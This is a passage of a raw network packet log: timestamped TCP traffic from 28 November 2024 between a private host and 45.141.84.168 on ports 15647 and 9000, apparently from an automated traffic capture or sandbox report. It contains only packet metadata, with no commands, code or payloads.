                                          Nov 28, 2024 13:40:38.893589020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.893646002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.897905111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.897962093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.897974968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.913331985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.917323112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.917332888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.917395115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.926237106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.926317930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.926503897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.942980051 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.944768906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.945810080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.945955992 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.955137014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.956708908 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.969465017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.972521067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.977605104 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.977773905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.977843046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.992520094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.992535114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.992613077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.992688894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.997484922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.000529051 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.009417057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.009927988 CET90004986545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.010020971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.010087967 CET90004986545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.010162115 CET498659000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.011099100 CET498659000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.011503935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.011559963 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.011605978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.011643887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.017996073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.018078089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.023056030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.024549007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.033730984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.035964012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.036009073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.036046028 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.045854092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.045865059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.046057940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.055521011 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.055530071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.055614948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.063935995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.064568043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.071525097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.071609974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.071681023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.089735985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.089874029 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.089972019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.091809034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.092520952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.112792015 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.112921000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.120647907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.124236107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.124289036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.124326944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.127346039 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.127435923 CET498709000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.127460957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.131083965 CET90004986545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.138005018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.140609026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.146204948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.148833036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.156219006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.156555891 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.171484947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.172169924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.184498072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.184839010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.193408966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.193541050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.207334042 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.220891953 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.233010054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.233103037 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.239238024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.239335060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.247759104 CET90004987045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.247770071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.247864962 CET498709000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.248289108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.248289108 CET498709000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.259582996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.268445015 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.268542051 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.276706934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.276782990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.290471077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.290555000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.292232990 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.292301893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.293709993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.293782949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.313463926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.313536882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.325365067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.325453043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.327510118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.327570915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.340915918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.341007948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.345989943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.346000910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.346071959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.357595921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.357707024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.368179083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.368279934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.368351936 CET90004987045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.379714012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.379782915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.385947943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.386029005 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.396857023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.396914959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.411454916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.411492109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.411524057 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.413829088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.413870096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.431531906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.434097052 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.434155941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.445643902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.445710897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.461038113 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.461106062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.462009907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.462083101 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.470098972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.470154047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.488430023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.488493919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.493558884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.493609905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.493626118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.494796991 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.494812012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.494851112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.505994081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.506057024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.514895916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.514934063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.528896093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.528947115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.528950930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.533823013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.533952951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.542407990 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.542471886 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.542562962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.551552057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.551618099 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.554425001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.554476023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.569581985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.569643021 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.569745064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.581207037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.581259966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.581274986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.590503931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.590605021 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.596031904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.596101999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.596107960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.612153053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.612232924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.612298012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.612345934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.622750998 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.622868061 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.622883081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.634910107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.634991884 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.641899109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.641987085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.642021894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.642080069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.654004097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.654095888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.662477970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.662553072 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.662558079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.662617922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.671185017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.671262026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.674757957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.674825907 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.679013968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.679097891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.679132938 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.689584970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.689650059 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.701311111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.701530933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.704128027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.704191923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.704195023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.707345963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.707415104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.716162920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.716238976 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.722490072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.722502947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.722558022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.732316971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.732403994 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.745289087 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.750313044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.750385046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.750396013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.750433922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.752382994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.752470016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.761867046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.761946917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.766987085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.767055988 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.779198885 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.779212952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.779328108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.783345938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.791661978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.795630932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.795773983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.809676886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.809747934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.809928894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.809978008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.809978962 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.810024977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.818608046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.818661928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.818666935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.823736906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.823805094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.827630997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.827687025 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.836348057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.836390018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.836431026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.850343943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.850414038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.850438118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.856175900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.856295109 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.865274906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.865329981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.870227098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.870292902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.870295048 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.872467995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.872526884 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.887223959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.887281895 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.890753984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.890773058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.890811920 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.902587891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.902664900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.905210018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.905253887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.917483091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.917535067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.917555094 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.932637930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.932706118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.932734966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.932786942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.934410095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.934482098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.943739891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.943881035 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.951524019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.951597929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.951600075 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.963445902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.963526964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.963535070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.975486040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.975581884 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.979907036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.980068922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.984270096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.984338045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:39.991816044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:39.991897106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.001740932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.001821995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.001827002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.011042118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.011118889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.019352913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.019423962 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.027354956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.027446032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.038729906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.038741112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.038825989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.043945074 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.044013977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.044029951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.054583073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.054681063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.064284086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.064357996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.066632986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.066699028 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.078567982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.078615904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.078674078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.095643044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.095733881 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.098409891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.098484039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.098558903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.098613024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.104386091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.104453087 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.117332935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.117415905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.117422104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.131475925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.131608009 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.133507013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.133572102 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.146111965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.146173000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.158550024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.158613920 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:40.158746958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.163957119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:40.164016008 CET4973015647192.168.2.445.141.84.168
